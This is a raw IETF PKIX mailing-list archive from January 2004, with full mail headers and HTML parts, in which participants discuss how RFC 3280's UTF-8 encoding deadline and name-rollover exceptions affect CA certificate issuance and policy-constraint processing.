inet-vrs-04.redmond.corp.microsoft.com (InterScan E-Mail VirusWall NT); Mon, 26 Jan 2004 14:18:34 -0800 Received: from red-imc-01.redmond.corp.microsoft.com ([157.54.9.102]) by inet-hub-05.redmond.corp.microsoft.com with Microsoft SMTPSVC(6.0.3790.0); Mon, 26 Jan 2004 14:18:38 -0800 Received: from win-imc-01.wingroup.windeploy.ntdev.microsoft.com ([157.54.0.39]) by red-imc-01.redmond.corp.microsoft.com with Microsoft SMTPSVC(6.0.3790.1069); Mon, 26 Jan 2004 14:18:41 -0800 Received: from WIN-MSG-10.wingroup.windeploy.ntdev.microsoft.com ([157.54.12.81]) by win-imc-01.wingroup.windeploy.ntdev.microsoft.com with Microsoft SMTPSVC(6.0.3790.1069); Mon, 26 Jan 2004 14:18:37 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5.7150.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="------------InterScan_NT_MIME_Boundary" Subject: RE: UTF-8 encoding after December 31 2003 Date: Mon, 26 Jan 2004 14:18:33 -0800 Message-ID: <340B5AC242DEF44AAFCD6DC102B51CD304693E19@WIN-MSG-10.wingroup.windeploy.ntdev.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: UTF-8 encoding after December 31 2003 thread-index: AcPkMPwvrZQsO2diT4+G4hV9EogPPQAJaHFw From: "Trevor Freeman" <trevorf@windows.microsoft.com> To: "Stefan Santesson" <stefans@microsoft.com> Cc: <ietf-pkix@imc.org> X-OriginalArrivalTime: 26 Jan 2004 22:18:37.0510 (UTC) FILETIME=[583D2E60:01C3E45A] Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This is a multi-part message in MIME format. --------------InterScan_NT_MIME_Boundary Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C3E45A.5AD2C6CC" ------_=_NextPart_001_01C3E45A.5AD2C6CC Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi Stefan, You have another problem with name rollover with policy constraint extension processing and self issued certificates. =20 4.1.2.4 of RFC3280 "(a) attribute values encoded in different types (e.g., PrintableString and BMPString) MAY be assumed to represent different strings; (b) attribute values in types other than PrintableString are case sensitive (this permits matching of attribute values as binary objects); =20 And in 6.1.4 "(h) If the issuer and subject names are not identical: (1) If explicit_policy is not 0, decrement explicit_policy by 1. (2) If policy_mapping is not 0, decrement policy_mapping by 1. (3) If inhibit_any-policy is not 0, decrement inhibit_any- policy by 1." =20 So an implementation interpreting the two values as different under clause (a) above will decrement the policy constraints coulters with name rollover when there is an encoding change. =20 Also encoding "CA" and "cA" in two separate rollover CA certificates as printable sting will not decrement the counters but encoding the same stings in UTF-8 will lead to different policy constraints path length results with name rollover under clause (b) above. =20 Trevor =20 ________________________________ From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Stefan Santesson Sent: Monday, January 26, 2004 9:23 AM To: ietf-pkix@imc.org Subject: UTF-8 encoding after December 31 2003 =20 All, =20 I have a problem with the UTF-8 requirements in RFC 3280 after December 31, and would appreciate guidance on interpretation of RFC 3280 as well as other implementers view on this. =20 The situation: =20 Conforming CA:s must encode attributes of DirectotyString types as UTF-8 after=20 December 31, 2003. =20 Exceptions are stated in RFC 3280 (section 4.1.2.4): =20 Exceptions to the December 31, 2003 UTF8 encoding requirements are as follows: =20 (a) CAs MAY issue "name rollover" certificates to support an orderly migration to UTF8String encoding. Such certificates would include the CA's UTF8String encoded name as issuer and and the old name encoding as subject, or vice-versa. =20 (b) As stated in section 4.1.2.6, the subject field MUST be populated with a non-empty distinguished name matching the contents of the issuer field in all certificates issued by the subject CA regardless of encoding. =20 =20 My interpretation of this is: =20 a) only applies for self issued certificates with the same CA name as issuer and subject (but in different encodings). Introducing such name roll-over certificates extend the certificate chain and may be problematic since it may break both naming and path length constraints expressed by chaining CAs. =20 b) seams to be a catch 22. You can populate the subject field with old encoding to match old encoded issuer names in descending certificates, but since no descending CA can populate the issuer field with old encoding it doesn't really apply. =20 =20 The issue: There seems to be a problem with practical reality here in case the interpretation above is correct. =20 Question 1) What if I have a Root CA valid to 2020 with subject and issuer name in old encoding? =20 Can that Root CA issue an intermediary CA certificate with the issuer field in old encoding, matching the subject field of the current root CA Certificate? =20 Question 2) What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the issuer name in old encoding, matching the encoding of the current CA certificate until it expires, or must this CA change its name and have its CA certificate renewed before December 31? =20 If RFC 3280 prevents operating CAs to issue certificates with the issuer field matching the CA:s current certificate, until it expires, then we face a huge legacy problem. Especially since name matching for different encoding types are not required. =20 4.1.2.4 states "(a) attribute values encoded in different types (e.g., PrintableString and BMPString) MAY be assumed to represent different strings;" =20 =20 If my concerns are wrong and the issuing such certificates is allowed, then this needs to be clarified. =20 =20 =20 Stefan Santesson Program Manager, Windows Security =20 ------_=_NextPart_001_01C3E45A.5AD2C6CC Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" = xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <!--[if !mso]> <style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--> <style> <!-- /* Font Definitions */ @font-face {font-family:"MS Mincho"; panose-1:2 2 6 9 4 2 5 8 3 4;} @font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4;} @font-face {font-family:"\@MS Mincho"; panose-1:2 2 6 9 4 2 5 8 3 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0pt; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0pt; margin-bottom:.0001pt; font-size:10.0pt; font-family:"Courier New";} span.EmailStyle18 {mso-style-type:personal; font-family:Arial; color:windowtext;} span.EmailStyle20 {mso-style-type:personal-reply; font-family:Arial; color:navy;} @page Section1 {size:612.0pt 792.0pt; margin:70.85pt 70.85pt 70.85pt 70.85pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Hi = Stefan,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>You have another problem with name = rollover with policy constraint extension processing and self issued = certificates.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>4.1.2.4 of = RFC3280<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>“(a) attribute values encoded = in different types (e.g., PrintableString and BMPString) MAY be assumed to represent different strings;<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'> (b) attribute values in types = other than PrintableString are case sensitive (this permits matching of = attribute values as binary objects); <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>And in = 6.1.4<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>“(h) If the issuer and = subject names are not identical:<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-indent:36.0pt'><font size=3D2 = color=3Dnavy face=3DArial><span = style=3D'font-size:10.0pt;font-family:Arial;color:navy'>(1) If explicit_policy is not 0, decrement explicit_policy by = 1.<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-indent:36.0pt'><font size=3D2 = color=3Dnavy face=3DArial><span = style=3D'font-size:10.0pt;font-family:Arial;color:navy'>(2) If policy_mapping is not 0, decrement policy_mapping by = 1.<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-indent:36.0pt'><font size=3D2 = color=3Dnavy face=3DArial><span = style=3D'font-size:10.0pt;font-family:Arial;color:navy'>(3) If inhibit_any-policy is not 0, decrement inhibit_any- policy by = 1.”<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>So an implementation interpreting = the two values as different under clause (a) above will decrement the policy = constraints coulters with name rollover when there is an encoding = change.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Also encoding “CA” and = “cA” in two separate rollover CA certificates as printable sting will not = decrement the counters but encoding the same stings in UTF-8 will lead to = different policy constraints path length results with name rollover under clause (b) = above.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Trevor<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <div> <div class=3DMsoNormal align=3Dcenter style=3D'text-align:center'><font = size=3D3 face=3D"Times New Roman"><span style=3D'font-size:12.0pt'> <hr size=3D3 width=3D"100%" align=3Dcenter tabindex=3D-1> </span></font></div> <p class=3DMsoNormal><b><font size=3D2 face=3DTahoma><span = style=3D'font-size:10.0pt; font-family:Tahoma;font-weight:bold'>From:</span></font></b><font = size=3D2 face=3DTahoma><span style=3D'font-size:10.0pt;font-family:Tahoma'> owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] = <b><span style=3D'font-weight:bold'>On Behalf Of </span></b>Stefan Santesson<br> <b><span style=3D'font-weight:bold'>Sent:</span></b> Monday, January 26, = 2004 9:23 AM<br> <b><span style=3D'font-weight:bold'>To:</span></b> ietf-pkix@imc.org<br> <b><span style=3D'font-weight:bold'>Subject:</span></b> UTF-8 encoding = after December 31 2003</span></font><o:p></o:p></p> </div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>All,<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>I have a problem with the UTF-8 requirements in RFC 3280 after = December 31, and would appreciate guidance on interpretation of RFC 3280 as well = as other implementers view on this.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>The situation:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Conforming CA:s must encode attributes of DirectotyString types = as UTF-8 after <o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>December 31, 2003.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Exceptions are stated in RFC 3280 (section = 4.1.2.4):<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> Exceptions to the December 31, 2003 UTF8 encoding requirements are as<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> follows:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> (a) CAs MAY issue = "name rollover" certificates to support an<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> orderly migration to UTF8String encoding. Such certificates would<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> include the CA's UTF8String = encoded name as issuer and and the old<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> name encoding as subject, or = vice-versa.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> (b) As stated in section = 4.1.2.6, the subject field MUST be<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> populated with a non-empty = distinguished name matching the<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> contents of the issuer field in = all certificates issued by the<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> subject CA regardless of = encoding.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>My interpretation of this is:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>a) only applies for self issued certificates with the same CA = name as issuer and subject (but in different encodings). Introducing such name roll-over certificates extend the certificate chain and may be = problematic since it may break both naming and path length constraints expressed by chaining CAs.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>b) seams to be a catch 22. You can populate the subject field = with old encoding to match old encoded issuer names in descending certificates, = but since no descending CA can populate the issuer field with old encoding = it doesn’t really apply.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>The issue:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>There seems to be a problem with practical reality here in case = the interpretation above is correct.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Question 1)<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>What if I have a Root CA valid to 2020 with subject and issuer = name in old encoding?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Can that Root CA issue an intermediary CA certificate with the = issuer field in old encoding, matching the subject field of the current root CA Certificate?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Question 2)<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the = issuer name in old encoding, matching the encoding of the current CA = certificate until it expires, or must this CA change its name and have its CA certificate = renewed before December 31?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>If RFC 3280 prevents operating CAs to issue certificates with = the issuer field matching the CA:s current certificate, until it expires, = then we face a huge legacy problem. Especially since name matching for different encoding types are not required.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>4.1.2.4 states<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>“(a) attribute values encoded in different types = (e.g.,<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> PrintableString and BMPString) = MAY be assumed to represent<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> different = strings;”<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>If my concerns are wrong and the issuing such certificates is = allowed, then this needs to be clarified.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><strong><b><font size=3D2 color=3Dolive = face=3DArial><span style=3D'font-size:10.0pt;font-family:Arial;color:olive'>Stefan = Santesson</span></font></b></strong><o:p></o:p></p> <p class=3DMsoNormal><font size=3D2 color=3Dolive face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:olive'>Program Manager, Windows = Security</span></font><o:p></o:p></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p> </o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C3E45A.5AD2C6CC-- --------------InterScan_NT_MIME_Boundary-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QKRcZ5057677; Mon, 26 Jan 2004 12:27:38 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0QKRctB057676; Mon, 26 Jan 2004 12:27:38 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp3.pacifier.net (smtp3.pacifier.net [64.255.237.173]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0QKRblB057669 for <ietf-pkix@imc.org>; Mon, 26 Jan 2004 12:27:37 -0800 (PST) (envelope-from jimsch@nwlink.com) Received: from ROMANS (ip237.132.dial-acs01.sea.iinet.com [209.20.132.237]) by smtp3.pacifier.net (Postfix) with ESMTP id AAC686D65B; Mon, 26 Jan 2004 12:27:35 -0800 (PST) Reply-To: <jimsch@exmsft.com> From: "Jim Schaad" <jimsch@nwlink.com> To: "'Stefan Santesson'" <stefans@microsoft.com>, <ietf-pkix@imc.org> Subject: RE: UTF-8 encoding after December 31 2003 Date: Mon, 26 Jan 2004 12:31:31 -0800 Message-ID: <010701c3e44b$62bf4c10$1400a8c0@augustcellars.local> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0108_01C3E408.549C0C10" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal In-Reply-To: <0C3042E92D8A714783E2C44AB9936E1DB13888@EUR-MSG-03.europe.corp.microsoft.com> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This is a multi-part message in MIME format. ------=_NextPart_000_0108_01C3E408.549C0C10 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Stefan, I don't read (b) in the same way as you do. I read this as saying if a CA has a certificate with a non-UTF8 encoded subject name, then the issuer name in all certificates it issues MUST be the non-UTF8 subject name of the CA. This means you don't need to update the CA certificate, but that all new certificates issued by the CA must be using UTF8 strings. jim -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Stefan Santesson Sent: Monday, January 26, 2004 9:23 AM To: ietf-pkix@imc.org Subject: UTF-8 encoding after December 31 2003 All, I have a problem with the UTF-8 requirements in RFC 3280 after December 31, and would appreciate guidance on interpretation of RFC 3280 as well as other implementers view on this. The situation: Conforming CA:s must encode attributes of DirectotyString types as UTF-8 after December 31, 2003. Exceptions are stated in RFC 3280 (section 4.1.2.4): Exceptions to the December 31, 2003 UTF8 encoding requirements are as follows: (a) CAs MAY issue "name rollover" certificates to support an orderly migration to UTF8String encoding. Such certificates would include the CA's UTF8String encoded name as issuer and and the old name encoding as subject, or vice-versa. (b) As stated in section 4.1.2.6, the subject field MUST be populated with a non-empty distinguished name matching the contents of the issuer field in all certificates issued by the subject CA regardless of encoding. My interpretation of this is: a) only applies for self issued certificates with the same CA name as issuer and subject (but in different encodings). Introducing such name roll-over certificates extend the certificate chain and may be problematic since it may break both naming and path length constraints expressed by chaining CAs. b) seams to be a catch 22. You can populate the subject field with old encoding to match old encoded issuer names in descending certificates, but since no descending CA can populate the issuer field with old encoding it doesn't really apply. The issue: There seems to be a problem with practical reality here in case the interpretation above is correct. Question 1) What if I have a Root CA valid to 2020 with subject and issuer name in old encoding? Can that Root CA issue an intermediary CA certificate with the issuer field in old encoding, matching the subject field of the current root CA Certificate? Question 2) What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the issuer name in old encoding, matching the encoding of the current CA certificate until it expires, or must this CA change its name and have its CA certificate renewed before December 31? If RFC 3280 prevents operating CAs to issue certificates with the issuer field matching the CA:s current certificate, until it expires, then we face a huge legacy problem. Especially since name matching for different encoding types are not required. 4.1.2.4 states "(a) attribute values encoded in different types (e.g., PrintableString and BMPString) MAY be assumed to represent different strings;" If my concerns are wrong and the issuing such certificates is allowed, then this needs to be clarified. Stefan Santesson Program Manager, Windows Security ------=_NextPart_000_0108_01C3E408.549C0C10 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML xmlns=3D"http://www.w3.org/TR/REC-html40" xmlns:o =3D=20 "urn:schemas-microsoft-com:office:office" xmlns:w =3D=20 "urn:schemas-microsoft-com:office:word"><HEAD> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Dus-ascii"> <TITLE>Message</TITLE> <META content=3D"MSHTML 6.00.2800.1276" name=3DGENERATOR> <STYLE>@page Section1 {size: 612.0pt 792.0pt; margin: 70.85pt 70.85pt = 70.85pt 70.85pt; } P.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman" } LI.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman" } DIV.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman" } A:link { COLOR: blue; TEXT-DECORATION: underline } SPAN.MsoHyperlink { COLOR: blue; TEXT-DECORATION: underline } A:visited { COLOR: purple; TEXT-DECORATION: underline } SPAN.MsoHyperlinkFollowed { COLOR: purple; TEXT-DECORATION: underline } P.MsoPlainText { FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Courier New" } LI.MsoPlainText { FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Courier New" } DIV.MsoPlainText { FONT-SIZE: 10pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Courier New" } SPAN.EmailStyle17 { COLOR: windowtext; FONT-FAMILY: Arial; mso-style-type: personal-compose } DIV.Section1 { page: Section1 } </STYLE> </HEAD> <BODY lang=3DEN-US vLink=3Dpurple link=3Dblue> <DIV><SPAN class=3D001572920-26012004><FONT face=3DArial color=3D#0000ff = size=3D2>Stefan,</FONT></SPAN></DIV> <DIV><SPAN class=3D001572920-26012004><FONT face=3DArial color=3D#0000ff = size=3D2></FONT></SPAN> </DIV> <DIV><SPAN class=3D001572920-26012004><FONT face=3DArial color=3D#0000ff = size=3D2>I=20 don't read (b) in the same way as you do. I read this as saying if = a CA=20 has a certificate with a non-UTF8 encoded subject name, then the = issuer=20 name in all certificates it issues MUST be the non-UTF8 subject name of = the=20 CA. This means you don't need to update the CA certificate, but = that all=20 new certificates issued by the CA must be using UTF8=20 strings.</FONT></SPAN></DIV> <DIV><SPAN class=3D001572920-26012004><FONT face=3DArial color=3D#0000ff = size=3D2></FONT></SPAN> </DIV> <DIV><SPAN class=3D001572920-26012004><FONT face=3DArial color=3D#0000ff = size=3D2>jim</FONT></SPAN></DIV> <BLOCKQUOTE dir=3Dltr=20 style=3D"PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #0000ff 2px = solid; MARGIN-RIGHT: 0px"> <DIV></DIV> <DIV class=3DOutlookMessageHeader lang=3Den-us dir=3Dltr = align=3Dleft><FONT=20 face=3DTahoma size=3D2>-----Original Message-----<BR><B>From:</B>=20 owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] = <B>On=20 Behalf Of </B>Stefan Santesson<BR><B>Sent:</B> Monday, January 26, = 2004 9:23=20 AM<BR><B>To:</B> ietf-pkix@imc.org<BR><B>Subject:</B> UTF-8 encoding = after=20 December 31 2003<BR><BR></FONT></DIV> <DIV class=3DSection1> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt">All,<o:p></o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT face=3D"Courier New" size=3D2><SPAN=20 style=3D"FONT-SIZE: 10pt"><o:p> </o:p></SPAN></FONT></P> <P class=3DMsoPlainText><FONT 